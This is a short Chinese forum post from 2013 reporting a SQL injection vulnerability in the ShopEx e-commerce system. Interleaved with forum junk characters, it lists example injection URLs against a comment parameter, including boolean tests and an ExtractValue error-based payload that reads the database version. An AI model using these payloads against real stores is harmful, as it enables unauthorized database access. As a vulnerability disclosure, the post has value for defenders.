注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
8 a* C# u- k+ U0 k& ]3 C: b3 F; c. K* A" Z6 r
好吧,我扯远了~~5 \6 r' l* u* Z" x$ K6 J
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
, T* T/ B. N2 H( s: l不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 3 _9 F% ~+ E% k: R7 w2 d- B1 [4 r* W z
8 e/ g/ J/ N0 c7 u: C8 V; bhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ; V( m: Y. Y5 w! m
+ J {5 B+ E9 b7 ?: n& V
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 5 O9 V1 \6 L# v1 H% ]
& ~& W/ D& F3 v1 E# Yhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
4 d+ ?/ L4 I) z" K# r+ z$ M
; v$ ~0 N8 T Chttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html & A7 g9 [; P6 f; l
5 y7 \! N# x2 V$ T+ h$ {
5 R: C. D# b, d
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。 ~7 O- C2 N6 B! e: @3 f" J# f2 |
如何注入就不多说了,10多年的东西了…不会也会了…
& j4 A( R! d4 M$ j: I$ V, w2 T# S! M" Z& j w
7 u- g! ?* r. v; V7 S' L
7 M( _- i; R8 e, K8 P; G) s) {, j' v1 f Y" l. @! m. F: D f9 y
|
发表于 2013-2-19 08:31:27
收藏
支持
反对